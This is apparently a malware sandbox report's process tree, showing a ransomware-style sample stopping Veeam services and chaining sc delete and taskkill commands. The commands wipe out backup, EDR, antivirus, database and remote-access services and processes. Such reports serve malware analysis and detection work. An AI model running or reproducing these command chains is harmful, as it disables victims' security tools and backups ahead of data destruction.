C:\Windows\system32\net1 stop TPlusStdAppService1300
5⤵
PID:5744

C:\Windows\SysWOW64\net.exe
net stop TPlusStdTaskService1300
4⤵
PID:4760

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TPlusStdTaskService1300
5⤵
PID:1728

C:\Windows\SysWOW64\net.exe
net stop TPlusStdUpgradeService1300
4⤵
PID:3692

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TPlusStdUpgradeService1300
5⤵
PID:1660

C:\Windows\SysWOW64\net.exe
net stop TPlusStdWebService1300
4⤵
PID:3584

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TPlusStdWebService1300
5⤵
PID:1388

C:\Windows\SysWOW64\net.exe
net stop VeeamNFSSvc
4⤵
PID:2804

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc
5⤵
PID:4832

C:\Windows\SysWOW64\net.exe
net stop VeeamDeploySvc
4⤵
PID:1696

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamDeploySvc
5⤵
PID:4324

C:\Windows\SysWOW64\net.exe
net stop VeeamCloudSvc
4⤵
PID:5944

C:\Windows\SysWOW64\net.exe
net stop VeeamMountSvc
4⤵
PID:792

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamMountSvc
5⤵
PID:720

C:\Windows\SysWOW64\net.exe
net stop VeeamBrokerSvc
4⤵
PID:2164

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamBrokerSvc
5⤵
PID:4160

C:\Windows\SysWOW64\cmd.exe
cmd /c "@color b & sc delete MSCRMAsyncService & @sc delete REPLICA & @sc delete RTCATS & @sc delete RTCAVMCU & @sc delete RtcQms & @sc delete RTCMEETINGMCU & @sc delete RTCIMMCU & @sc delete RTCDATAMCU & @sc delete RTCCDR & @sc delete ProjectEventService16 & @sc delete ProjectQueueService16 & @sc delete SPAdminV4 & @sc delete SPSearchHostController & @sc delete SPTimerV4 & @sc delete SPTraceV4 & @sc delete OSearch16 & @sc delete ProjectCalcService16 & @sc delete c2wts & @sc delete AppFabricCachingService & @sc delete ADWS & @sc delete MotionBoard57 & @sc delete MotionBoardRCService57 & @sc delete vsvnjobsvc & @sc delete VisualSVNServer & @sc delete "FlexNet Licensing Service 64" & @sc delete BestSyncSvc & @sc delete LPManager & @sc delete MediatekRegistryWriter & @sc delete RaAutoInstSrv_RT2870 & @sc delete CobianBackup10 & @sc delete SQLANYs_sem5 & @sc delete CASLicenceServer & @sc delete SQLService & @sc delete semwebsrv & @sc delete TbossSystem & @sc delete ErpEnvSvc & @sc delete Mysoft.Autoupgrade.DispatchService & @sc delete Mysoft.Autoupgrade.UpdateService & @sc delete Mysoft.Config.WindowsService & @sc delete Mysoft.DataCenterService & @sc delete Mysoft.SchedulingService & @sc delete Mysoft.Setup.InstallService & @sc delete MysoftUpdate & @sc delete edr_monitor & @sc delete abs_deployer & @sc delete savsvc & @sc delete ShareBoxMonitorService & @sc delete ShareBoxService & @sc delete CloudExchangeService & @sc delete "U8WorkerService2" & @sc delete CIS & @sc delete EASService & @sc delete KICkSvr & @sc delete "OSP Service" & @sc delete U8SmsSrv & @sc delete OfficeClearCache & @sc delete TurboCRM70 & @sc delete U8DispatchService & @sc delete U8EISService & @sc delete U8EncryptService & @sc delete U8GCService & @sc delete U8KeyManagePool & @sc delete "U8MPool" & @sc delete U8SCMPool & @sc delete U8SLReportService & @sc delete U8TaskService & @sc delete "U8WebPool" & @sc delete UFAllNet & @sc delete UFReportService & @sc delete UTUService & @sc delete "U8WorkerService1""
3⤵
PID:5964

C:\Windows\SysWOW64\sc.exe
sc delete MSCRMAsyncService
4⤵
PID:3732

C:\Windows\SysWOW64\sc.exe
sc delete REPLICA
4⤵
PID:2932

C:\Windows\SysWOW64\sc.exe
sc delete RTCATS
4⤵
PID:6060

C:\Windows\SysWOW64\sc.exe
sc delete RTCAVMCU
4⤵
PID:4084

C:\Windows\SysWOW64\sc.exe
sc delete RtcQms
4⤵
PID:4432

C:\Windows\SysWOW64\sc.exe
sc delete RTCMEETINGMCU
4⤵
PID:688

C:\Windows\SysWOW64\sc.exe
sc delete RTCIMMCU
4⤵
PID:5292

C:\Windows\SysWOW64\sc.exe
sc delete RTCDATAMCU
4⤵
PID:6076

C:\Windows\SysWOW64\sc.exe
sc delete RTCCDR
4⤵
PID:4756

C:\Windows\SysWOW64\sc.exe
sc delete ProjectEventService16
4⤵
PID:5892

C:\Windows\SysWOW64\sc.exe
sc delete ProjectQueueService16
4⤵
PID:5796

C:\Windows\SysWOW64\sc.exe
sc delete SPAdminV4
4⤵
PID:2848

C:\Windows\SysWOW64\sc.exe
sc delete SPSearchHostController
4⤵
PID:5404

C:\Windows\SysWOW64\sc.exe
sc delete SPTimerV4
4⤵
PID:4336

C:\Windows\SysWOW64\sc.exe
sc delete SPTraceV4
4⤵
PID:5040

C:\Windows\SysWOW64\sc.exe
sc delete OSearch16
4⤵
PID:3284

C:\Windows\SysWOW64\sc.exe
sc delete ProjectCalcService16
4⤵
- Launches sc.exe
PID:4460

C:\Windows\SysWOW64\sc.exe
sc delete c2wts
4⤵
- Launches sc.exe
PID:4444

C:\Windows\SysWOW64\sc.exe
sc delete AppFabricCachingService
4⤵
- Launches sc.exe
PID:4216

C:\Windows\SysWOW64\sc.exe
sc delete ADWS
4⤵
PID:688

C:\Windows\SysWOW64\sc.exe
sc delete MotionBoard57
4⤵
- Launches sc.exe
PID:5792

C:\Windows\SysWOW64\sc.exe
sc delete MotionBoardRCService57
4⤵
- Launches sc.exe
PID:5420

C:\Windows\SysWOW64\sc.exe
sc delete vsvnjobsvc
4⤵
PID:4240

C:\Windows\SysWOW64\sc.exe
sc delete VisualSVNServer
4⤵
PID:5604

C:\Windows\SysWOW64\sc.exe
sc delete "FlexNet Licensing Service 64"
4⤵
PID:3872

C:\Windows\SysWOW64\sc.exe
sc delete BestSyncSvc
4⤵
PID:1728

C:\Windows\SysWOW64\sc.exe
sc delete LPManager
4⤵
PID:2848

C:\Windows\SysWOW64\sc.exe
sc delete MediatekRegistryWriter
4⤵
PID:5268

C:\Windows\SysWOW64\sc.exe
sc delete RaAutoInstSrv_RT2870
4⤵
PID:5448

C:\Windows\SysWOW64\sc.exe
sc delete CobianBackup10
4⤵
PID:1472

C:\Windows\SysWOW64\sc.exe
sc delete SQLANYs_sem5
4⤵
PID:3788

C:\Windows\SysWOW64\sc.exe
sc delete CASLicenceServer
4⤵
- Launches sc.exe
PID:3280

C:\Windows\SysWOW64\sc.exe
sc delete SQLService
4⤵
PID:5988

C:\Windows\SysWOW64\sc.exe
sc delete semwebsrv
4⤵
- Launches sc.exe
PID:4496

C:\Windows\SysWOW64\sc.exe
sc delete TbossSystem
4⤵
PID:4228

C:\Windows\SysWOW64\sc.exe
sc delete ErpEnvSvc
4⤵
PID:4396

C:\Windows\SysWOW64\sc.exe
sc delete Mysoft.Autoupgrade.DispatchService
4⤵
PID:720

C:\Windows\SysWOW64\sc.exe
sc delete Mysoft.Autoupgrade.UpdateService
4⤵
PID:1904

C:\Windows\SysWOW64\sc.exe
sc delete Mysoft.Config.WindowsService
4⤵
- Launches sc.exe
PID:4160

C:\Windows\SysWOW64\sc.exe
sc delete Mysoft.DataCenterService
4⤵
PID:2980

C:\Windows\SysWOW64\sc.exe
sc delete Mysoft.SchedulingService
4⤵
PID:6064

C:\Windows\SysWOW64\sc.exe
sc delete Mysoft.Setup.InstallService
4⤵
PID:1164

C:\Windows\SysWOW64\sc.exe
sc delete MysoftUpdate
4⤵
PID:4448

C:\Windows\SysWOW64\sc.exe
sc delete edr_monitor
4⤵
- Launches sc.exe
PID:5364

C:\Windows\SysWOW64\sc.exe
sc delete abs_deployer
4⤵
PID:5724

C:\Windows\SysWOW64\sc.exe
sc delete savsvc
4⤵
PID:5836

C:\Windows\SysWOW64\sc.exe
sc delete ShareBoxMonitorService
4⤵
PID:856

C:\Windows\SysWOW64\sc.exe
sc delete ShareBoxService
4⤵
PID:2584

C:\Windows\SysWOW64\sc.exe
sc delete CloudExchangeService
4⤵
PID:4336

C:\Windows\SysWOW64\sc.exe
sc delete "U8WorkerService2"
4⤵
- Launches sc.exe
PID:4892

C:\Windows\SysWOW64\sc.exe
sc delete CIS
4⤵
PID:5392

C:\Windows\SysWOW64\sc.exe
sc delete EASService
4⤵
PID:5456

C:\Windows\SysWOW64\sc.exe
sc delete KICkSvr
4⤵
PID:5412

C:\Windows\SysWOW64\sc.exe
sc delete "OSP Service"
4⤵
PID:5424

C:\Windows\SysWOW64\sc.exe
sc delete U8SmsSrv
4⤵
PID:432

C:\Windows\SysWOW64\sc.exe
sc delete OfficeClearCache
4⤵
- Launches sc.exe
PID:5484

C:\Windows\SysWOW64\sc.exe
sc delete TurboCRM70
4⤵
PID:4244

C:\Windows\SysWOW64\sc.exe
sc delete U8DispatchService
4⤵
PID:3500

C:\Windows\SysWOW64\sc.exe
sc delete U8EISService
4⤵
PID:5568

C:\Windows\SysWOW64\sc.exe
sc delete U8EncryptService
4⤵
PID:5292

C:\Windows\SysWOW64\sc.exe
sc delete U8GCService
4⤵
PID:5564

C:\Windows\SysWOW64\cmd.exe
cmd /c "color b & @sc delete "UWS LoPriv Services" & @sc delete ftnlsv3 & @sc delete ftnlses3 & @sc delete FxService & @sc delete "UtilDev Web Server Pro" & @sc delete ftusbrdwks & @sc delete ftusbrdsrv & @sc delete "ZTE USBIP Client Guard" & @sc delete "ZTE USBIP Client" & @sc delete "ZTE FileTranS" & @sc delete wwbizsrv & @sc delete qemu-ga & @sc delete AlibabaProtect & @sc delete ZTEVdservice & @sc delete kbasesrv & @sc delete MMRHookService & @sc delete OracleJobSchedulerORCL & @sc delete IpOverUsbSvc & @sc delete MsDtsServer100 & @sc delete KuaiYunTools & @sc delete KMSELDI & @sc delete btPanel & @sc delete Protect_2345Explorer & @sc delete 2345PicSvc & @sc delete vmware-converter-agent & @sc delete vmware-converter-server & @sc delete vmware-converter-worker & @sc delete QQCertificateService & @sc delete OracleRemExecService & @sc delete GPSDaemon & @sc delete GPSUserSvr & @sc delete GPSDownSvr & @sc delete GPSStorageSvr & @sc delete GPSDataProcSvr & @sc delete GPSGatewaySvr & @sc delete GPSMediaSvr & @sc delete GPSLoginSvr & @sc delete GPSTomcat6 & @sc delete GPSMysqld & @sc delete GPSFtpd & @sc delete "Zabbix Agent" & @sc delete BackupExecAgentAccelerator & @sc delete bedbg & @sc delete BackupExecDeviceMediaService & @sc delete BackupExecRPCService & @sc delete BackupExecAgentBrowser & @sc delete BackupExecJobEngine & @sc delete BackupExecManagementService & @sc delete MDM & @sc delete TxQBService & @sc delete Gailun_Downloader & @sc delete RemoteAssistService & @sc delete YunService & @sc delete Serv-U & @sc delete "EasyFZS Server" & @sc delete "Rpc Monitor" & @sc delete OpenFastAssist & @sc delete "Nuo Update Monitor" & @sc delete "Daemon Service" & @sc delete asComSvc & @sc delete OfficeUpdateService & @sc delete RtcSrv & @sc delete RTCASMCU & @sc delete FTA & @sc delete MASTER & @sc delete NscAuthService & @sc delete MSCRMUnzipService & @sc delete MSCRMAsyncService$maintenance"
3⤵
PID:3200

C:\Windows\SysWOW64\sc.exe
sc delete "UWS LoPriv Services"
4⤵
PID:2676

C:\Windows\SysWOW64\sc.exe
sc delete ftnlsv3
4⤵
PID:4844

C:\Windows\SysWOW64\sc.exe
sc delete ftnlses3
4⤵
PID:5272

C:\Windows\SysWOW64\sc.exe
sc delete FxService
4⤵
PID:4836

C:\Windows\SysWOW64\sc.exe
sc delete "UtilDev Web Server Pro"
4⤵
- Launches sc.exe
PID:5400

C:\Windows\SysWOW64\sc.exe
sc delete ftusbrdwks
4⤵
PID:4760

C:\Windows\SysWOW64\sc.exe
sc delete ftusbrdsrv
4⤵
PID:5768

C:\Windows\SysWOW64\sc.exe
sc delete "ZTE USBIP Client Guard"
4⤵
PID:1244

C:\Windows\SysWOW64\sc.exe
sc delete "ZTE USBIP Client"
4⤵
PID:4548

C:\Windows\SysWOW64\sc.exe
sc delete "ZTE FileTranS"
4⤵
- Launches sc.exe
PID:5376

C:\Windows\SysWOW64\sc.exe
sc delete wwbizsrv
4⤵
PID:5776

C:\Windows\SysWOW64\sc.exe
sc delete qemu-ga
4⤵
PID:4744

C:\Windows\SysWOW64\sc.exe
sc delete AlibabaProtect
4⤵
- Launches sc.exe
PID:5512

C:\Windows\SysWOW64\sc.exe
sc delete ZTEVdservice
4⤵
PID:6084

C:\Windows\SysWOW64\sc.exe
sc delete kbasesrv
4⤵
PID:5008

C:\Windows\SysWOW64\sc.exe
sc delete MMRHookService
4⤵
PID:4180

C:\Windows\SysWOW64\sc.exe
sc delete OracleJobSchedulerORCL
4⤵
- Launches sc.exe
PID:64

C:\Windows\SysWOW64\sc.exe
sc delete IpOverUsbSvc
4⤵
PID:5924

C:\Windows\SysWOW64\sc.exe
sc delete MsDtsServer100
4⤵
PID:2840

C:\Windows\SysWOW64\sc.exe
sc delete KuaiYunTools
4⤵
PID:504

C:\Windows\SysWOW64\sc.exe
sc delete KMSELDI
4⤵
PID:876

C:\Windows\SysWOW64\sc.exe
sc delete btPanel
4⤵
PID:5960

C:\Windows\SysWOW64\sc.exe
sc delete Protect_2345Explorer
4⤵
- Launches sc.exe
PID:2072

C:\Windows\SysWOW64\sc.exe
sc delete 2345PicSvc
4⤵
PID:4380

C:\Windows\SysWOW64\sc.exe
sc delete vmware-converter-agent
4⤵
- Launches sc.exe
PID:5724

C:\Windows\SysWOW64\sc.exe
sc delete vmware-converter-server
4⤵
PID:4724

C:\Windows\SysWOW64\sc.exe
sc delete vmware-converter-worker
4⤵
PID:2012

C:\Windows\SysWOW64\sc.exe
sc delete QQCertificateService
4⤵
PID:3424

C:\Windows\SysWOW64\sc.exe
sc delete OracleRemExecService
4⤵
PID:6084

C:\Windows\SysWOW64\sc.exe
sc delete GPSDaemon
4⤵
PID:5500

C:\Windows\SysWOW64\sc.exe
sc delete GPSUserSvr
4⤵
PID:2496

C:\Windows\SysWOW64\sc.exe
sc delete GPSDownSvr
4⤵
- Launches sc.exe
PID:2300

C:\Windows\SysWOW64\sc.exe
sc delete GPSStorageSvr
4⤵
- Launches sc.exe
PID:6068

C:\Windows\SysWOW64\sc.exe
sc delete GPSDataProcSvr
4⤵
PID:6120

C:\Windows\SysWOW64\sc.exe
sc delete GPSGatewaySvr
4⤵
PID:4128

C:\Windows\SysWOW64\sc.exe
sc delete GPSMediaSvr
4⤵
PID:2484

C:\Windows\SysWOW64\sc.exe
sc delete GPSLoginSvr
4⤵
PID:2596

C:\Windows\SysWOW64\sc.exe
sc delete GPSTomcat6
4⤵
PID:2308

C:\Windows\SysWOW64\sc.exe
sc delete GPSMysqld
4⤵
PID:5492

C:\Windows\SysWOW64\sc.exe
sc delete GPSFtpd
4⤵
PID:4488

C:\Windows\SysWOW64\sc.exe
sc delete "Zabbix Agent"
4⤵
PID:5168

C:\Windows\SysWOW64\sc.exe
sc delete BackupExecAgentAccelerator
4⤵
PID:1316

C:\Windows\SysWOW64\sc.exe
sc delete bedbg
4⤵
PID:3776

C:\Windows\SysWOW64\sc.exe
sc delete BackupExecDeviceMediaService
4⤵
PID:4116

C:\Windows\SysWOW64\sc.exe
sc delete BackupExecRPCService
4⤵
PID:5376

C:\Windows\SysWOW64\sc.exe
sc delete BackupExecAgentBrowser
4⤵
PID:2768

C:\Windows\SysWOW64\sc.exe
sc delete BackupExecJobEngine
4⤵
- Launches sc.exe
PID:5132

C:\Windows\SysWOW64\sc.exe
sc delete BackupExecManagementService
4⤵
PID:3820

C:\Windows\SysWOW64\sc.exe
sc delete MDM
4⤵
PID:5932

C:\Windows\SysWOW64\sc.exe
sc delete TxQBService
4⤵
PID:5500

C:\Windows\SysWOW64\sc.exe
sc delete Gailun_Downloader
4⤵
- Launches sc.exe
PID:4888

C:\Windows\SysWOW64\sc.exe
sc delete RemoteAssistService
4⤵
PID:4460

C:\Windows\SysWOW64\sc.exe
sc delete YunService
4⤵
PID:5648

C:\Windows\SysWOW64\sc.exe
sc delete Serv-U
4⤵
PID:3884

C:\Windows\SysWOW64\sc.exe
sc delete "EasyFZS Server"
4⤵
- Launches sc.exe
PID:5700

C:\Windows\SysWOW64\sc.exe
sc delete "Rpc Monitor"
4⤵
- Launches sc.exe
PID:5540

C:\Windows\SysWOW64\sc.exe
sc delete OpenFastAssist
4⤵
PID:2668

C:\Windows\SysWOW64\sc.exe
sc delete "Nuo Update Monitor"
4⤵
PID:3596

C:\Windows\SysWOW64\sc.exe
sc delete "Daemon Service"
4⤵
PID:5628

C:\Windows\SysWOW64\cmd.exe
cmd /c "color e & @taskkill /IM VBoxSDS.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM TeamViewer_Service.exe /F & @taskkill /IM TeamViewer.exe /F & @taskkill /IM CasLicenceServer.exe /F & @taskkill /IM tv_w32.exe /F & @taskkill /IM tv_x64.exe /F & @taskkill /IM rdm.exe /F & @taskkill /IM SecureCRT.exe /F & @taskkill /IM SecureCRTPortable.exe /F & @taskkill /IM VirtualBox.exe /F & @taskkill /IM VBoxSVC.exe /F & @taskkill /IM VirtualBoxVM.exe /F & @taskkill /IM abs_deployer.exe /F & @taskkill /IM edr_monitor.exe /F & @taskkill /IM sfupdatemgr.exe /F & @taskkill /IM ipc_proxy.exe /F & @taskkill /IM edr_agent.exe /F & @taskkill /IM edr_sec_plan.exe /F & @taskkill /IM sfavsvc.exe /F & @taskkill /IM DataShareBox.ShareBoxMonitorService.exe /F & @taskkill /IM DataShareBox.ShareBoxService.exe /F & @taskkill /IM Jointsky.CloudExchangeService.exe /F & @taskkill /IM Jointsky.CloudExchange.NodeService.ein /F & @taskkill /IM perl.exe /F & @taskkill /IM java.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM TsServer.exe /F & @taskkill /IM AppMain.exe /F & @taskkill /IM easservice.exe /F & @taskkill /IM Kingdee6.1.exe /F & @taskkill /IM QyKernel.exe /F & @taskkill /IM QyFragment.exe /F & @taskkill /IM UserClient.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM ComputerZTray.exe /F & @taskkill /IM ComputerZService.exe /F & @taskkill /IM ClearCache.exe /F & @taskkill /IM ProLiantMonitor.exe /F & @taskkill /IM ChsIME.exe /F & @taskkill /IM bugreport.exe /F & @taskkill /IM GNWebServer.exe /F & @taskkill /IM UI0Detect.exe /F & @taskkill /IM GNCore.exe /F & @taskkill /IM gnwayDDNS.exe /F & @taskkill /IM GNWebHelper.exe /F & @taskkill /IM php-cgi.exe /F & @taskkill /IM ESLUSBService.exe /F & @taskkill /IM CQA.exe /F & @taskkill /IM Kekcoek.pif /F & @taskkill /IM Tinuknx.exe /F & @taskkill /IM servers.exe /F & @taskkill /IM ping.exe /F & @taskkill /IM TianHeng.exe /F & @taskkill /IM K3MobileService.exe /F & @taskkill /IM VSSVC.exe /F & @taskkill /IM Xshell.exe /F & @taskkill /IM XshellCore.exe /F & @taskkill /IM FNPLicensingService.exe /F & @taskkill /IM XYNTService.exe /F & @taskkill /IM U8DispatchService.exe /F & @taskkill /IM EISService.exe /F & @taskkill /IM UFSoft.U8.Framework.EncryptManager.exe /F & @taskkill /IM yonyou.u8.gc.taskmanager.servicebus.exe /F & @taskkill /IM U8KeyManagePool.exe /F & @taskkill /IM U8MPool.exe /F & @taskkill /IM U8SCMPool.exe /F & @taskkill /IM UFIDA.U8.Report.SLReportService.exe /F & @taskkill /IM U8TaskService.exe /F & @taskkill /IM U8TaskWorker.exe /F & @taskkill /IM U8WebPool.exe /F & @taskkill /IM U8AllAuthServer.exe /F & @taskkill /IM UFIDA.U8.UAP.ReportService.exe /F & @taskkill /IM UFIDA.U8.ECE.UTU.Services.exe /F & @taskkill /IM U8WorkerService.exe /F & @taskkill /IM UFIDA.U8.ECE.UTU.exe /F & @taskkill /IM ShellStub.exe /F & @taskkill /IM U8UpLoadTask.exe /F & @taskkill /IM UfSysHostingService.exe /F & @taskkill /IM UFIDA.UBF.SystemManage.ApplicationService.exe /F & @taskkill /IM UFIDA.U9.CS.Collaboration.MailService.exe /F & @taskkill /IM NotificationService.exe /F & @taskkill /IM UBFdevenv.exe /F & @taskkill /IM UFIDA.U9.SystemManage.SystemManagerClient.exe /F & @taskkill /IM mongod.exe /F & @taskkill /IM SpusCss.exe /F & @taskkill /IM UUDesktop.exe /F & @taskkill /IM KDHRServices.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.BkgSvcHost.exe /F & @taskkill /IM Kingdee.K3.HR.Server.exe /F & @taskkill /IM Kingdee.K3.Mobile.Servics.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.KDSvrMgrHost.exe /F & @taskkill /IM KDSvrMgrService.exe /F & @taskkill /IM pdfServer.exe /F & @taskkill /IM pdfspeedup.exe /F & @taskkill /IM SufAppServer.exe /F & @taskkill /IM tomcat5.exe /F & @taskkill /IM Kingdee.K3.Mobile.LightPushService.exe /F & @taskkill /IM iMTSSvcMgr.exe /F & @taskkill /IM kdmain.exe /F & @taskkill /IM KDActMGr.exe /F & @taskkill /IM Kingdee.DeskTool.exe /F & @taskkill /IM K3ServiceUpdater.exe /F & @taskkill /IM Aua.exe /F & @taskkill /IM iNethinkSQLBackup.exe /F & @taskkill /IM auaJW.exe /F & @taskkill /IM Scheduler.exe /F & @taskkill /IM bschJW.exe /F & @taskkill /IM SystemTray64.exe /F & @taskkill /IM OfficeDaemon.exe /F & @taskkill /IM OfficeIndex.exe /F & @taskkill /IM OfficeIm.exe /F & @taskkill /IM iNethinkSQLBackupConsole.exe /F & @taskkill /IM OfficeMail.exe /F & @taskkill /IM OfficeTask.exe /F & @taskkill /IM OfficePOP3.exe /F & @taskkill /IM apache.exe /F & @taskkill /IM GnHostService.exe /F /T & @taskkill /IM HwUVPUpgrade.exe /F /T & @taskkill /IM "Kingdee.KIS.UESystemSer.exe" /F /T & @taskkill /IM uvpmonitor.exe /F /T & @taskkill /IM UVPUpgradeService.exe /F /T & @taskkill /IM KDdataUpdate.exe /F /T & @taskkill /IM Portal.exe /F /T & @taskkill /IM U8SMSSrv.exe /F /T & @taskkill /IM "Ufida.T.SM.PublishService.exe" /F /T & @taskkill /IM lta8.exe /F /T & @taskkill /IM UfSvrMgr.exe /F /T & @taskkill /IM AutoUpdateService.exe /F /T & @taskkill /IM MOM.exe /F /T"
3⤵
PID:5936

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM VBoxSDS.exe /F
4⤵
PID:2060

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM mysqld.exe /F
4⤵
PID:5300

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM TeamViewer_Service.exe /F
4⤵
PID:1148

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM TeamViewer.exe /F
4⤵
PID:4048

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM CasLicenceServer.exe /F
4⤵
- Kills process with taskkill
PID:6008

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM tv_w32.exe /F
4⤵
PID:5620

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM tv_x64.exe /F
4⤵
PID:3568

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM rdm.exe /F
4⤵
PID:272

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM SecureCRT.exe /F
4⤵
PID:3888

C:\Windows\SysWOW64\cmd.exe
cmd /c "color e & @taskkill /IM BackupExec.exe /F & @taskkill /IM Att.exe /F & @taskkill /IM mdm.exe /F & @taskkill /IM BackupExecManagementService.exe /F & @taskkill /IM bengine.exe /F & @taskkill /IM benetns.exe /F & @taskkill /IM beserver.exe /F & @taskkill /IM pvlsvr.exe /F & @taskkill /IM bedbg.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM RemoteAssistProcess.exe /F & @taskkill /IM BarMoniService.exe /F & @taskkill /IM GoodGameSrv.exe /F & @taskkill /IM BarCMService.exe /F & @taskkill /IM TsService.exe /F & @taskkill /IM GoodGame.exe /F & @taskkill /IM BarServerView.exe /F & @taskkill /IM IcafeServicesTray.exe /F & @taskkill /IM BsAgent_0.exe /F & @taskkill /IM ControlServer.exe /F & @taskkill /IM DisklessServer.exe /F & @taskkill /IM DumpServer.exe /F & @taskkill /IM NetDiskServer.exe /F & @taskkill /IM PersonUDisk.exe /F & @taskkill /IM service_agent.exe /F & @taskkill /IM SoftMemory.exe /F & @taskkill /IM BarServer.exe /F & @taskkill /IM RtkNGUI64.exe /F & @taskkill /IM Serv-U-Tray.exe /F & @taskkill /IM QQPCSoftTrayTips.exe /F & @taskkill /IM SohuNews.exe /F & @taskkill /IM Serv-U.exe /F & @taskkill /IM QQPCRTP.exe /F & @taskkill /IM EasyFZS.exe /F & @taskkill /IM HaoYiShi.exe /F & @taskkill /IM HysMySQL.exe /F & @taskkill /IM wtautoreg.exe /F & @taskkill /IM ispiritPro.exe /F & @taskkill /IM CAService.exe /F & @taskkill /IM XAssistant.exe /F & @taskkill /IM TrustCA.exe /F & @taskkill /IM GEUU20003.exe /F & @taskkill /IM CertMgr.exe /F & @taskkill /IM eSafe_monitor.exe /F & @taskkill /IM MainExecute.exe /F & @taskkill /IM FastInvoice.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM sesvc.exe /F & @taskkill /IM ScanFileServer.exe /F & @taskkill /IM Nuoadehgcgcd.exe /F & @taskkill /IM OpenFastAssist.exe /F & @taskkill /IM FastInvoiceAssist.exe /F & @taskkill /IM Nuoadfaggcje.exe /F & @taskkill /IM OfficeUpdate.exe /F & @taskkill /IM atkexComSvc.exe /F & @taskkill /IM FileTransferAgent.exe /F & @taskkill /IM MasterReplicatorAgent.exe /F & @taskkill /IM CrmAsyncService.exe /F & @taskkill /IM CrmAsyncService.exe /F & @taskkill /IM CrmUnzipService.exe /F & @taskkill /IM NscAuthService.exe /F & @taskkill /IM ReplicaReplicatorAgent.exe /F & @taskkill /IM ASMCUSvc.exe /F & @taskkill /IM OcsAppServerHost.exe /F & @taskkill /IM RtcCdr.exe /F & @taskkill /IM IMMCUSvc.exe /F & @taskkill /IM DataMCUSvc.exe /F & @taskkill /IM MeetingMCUSvc.exe /F & @taskkill /IM QmsSvc.exe /F & @taskkill /IM RTCSrv.exe /F & @taskkill /IM pnopagw.exe /F & @taskkill /IM NscAuth.exe /F & @taskkill /IM Microsoft.ActiveDirectory.WebServices.exe /F & @taskkill /IM DistributedCacheService.exe /F & @taskkill /IM c2wtshost.exe /F & @taskkill /IM Microsoft.Office.Project.Server.Calculation.exe /F & @taskkill /IM schedengine.exe /F & @taskkill /IM Microsoft.Office.Project.Server.Eventing.exe /F & @taskkill /IM Microsoft.Office.Project.Server.Queuing.exe /F & @taskkill /IM WSSADMIN.EXE /F & @taskkill /IM hostcontrollerservice.exe /F & @taskkill /IM noderunner.exe /F & @taskkill /IM OWSTIMER.EXE /F & @taskkill /IM wsstracing.exe /F & @taskkill /IM mssearch.exe /F & @taskkill /IM MySQLInstallerConsole.exe /F & @taskkill /IM EXCEL.EXE /F & @taskkill /IM consent.exe /F & @taskkill /IM RtkAudioService64.exe /F & @taskkill /IM RAVBg64.exe /F & @taskkill /IM FNPLicensingService64.exe /F & @taskkill /IM VisualSVNServer.exe /F & @taskkill /IM MotionBoard57.exe /F & @taskkill /IM MotionBoardRCService57.exe /F & @taskkill /IM LPManService.exe /F & @taskkill /IM RaRegistry.exe /F & @taskkill /IM RaAutoInstSrv.exe /F & @taskkill /IM RtHDVCpl.exe /F & @taskkill /IM DefenderDaemon.exe /F & @taskkill /IM BestSyncApp.exe /F & @taskkill /IM ApUI.exe /F & @taskkill /IM AutoUpdate.exe /F & @taskkill /IM LPManNotifier.exe /F & @taskkill /IM FieldAnalyst.exe /F & @taskkill /IM TimingGenerate.exe /F & @taskkill /IM Detector.exe /F & @taskkill /IM Estimator.exe /F & @taskkill /IM FA_Logwriter.exe /F & @taskkill /IM TrackingSrv.exe /F & @taskkill /IM cbInterface.exe /F & @taskkill /IM EnterprisePortal.exe /F & @taskkill /IM ccbService.exe /F & @taskkill /IM monitor.exe /F & @taskkill /IM U8DispatchService.exe /F & @taskkill /IM dbsrv16.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM KICManager.exe /F & @taskkill /IM KICMain.exe /F & @taskkill /IM ServerManagerLauncher.exe /F & @taskkill /IM TbossGate.exe /F & @taskkill /IM iusb3mon.exe /F & @taskkill /IM MgrEnvSvc.exe /F & @taskkill /IM Mysoft.Config.WindowsService.exe /F & @taskkill /IM Mysoft.UpgradeService.UpdateService.exe /F & @taskkill /IM hasplms.exe /F & @taskkill /IM Mysoft.Setup.InstallService.exe /F & @taskkill /IM Mysoft.UpgradeService.Dispatcher.exe /F & @taskkill /IM Mysoft.DataCenterService.WindowsHost.exe /F & @taskkill /IM Mysoft.DataCenterService.DataCleaning.exe /F & @taskkill /IM Mysoft.DataCenterService.DataTracking.exe /F & @taskkill /IM Mysoft.SchedulingService.WindowsHost.exe /F & @taskkill /IM ServiceMonitor.exe /F & @taskkill /IM Mysoft.SchedulingService.ExecuteEngine.exe /F & @taskkill /IM AgentX.exe /F & @taskkill /IM host.exe /F & @taskkill /IM AutoUpdate.exe /F & @taskkill /IM vsjitdebugger.exe /F"
3⤵
PID:5000

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM BackupExec.exe /F
4⤵
PID:1384

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM Att.exe /F
4⤵
PID:3760

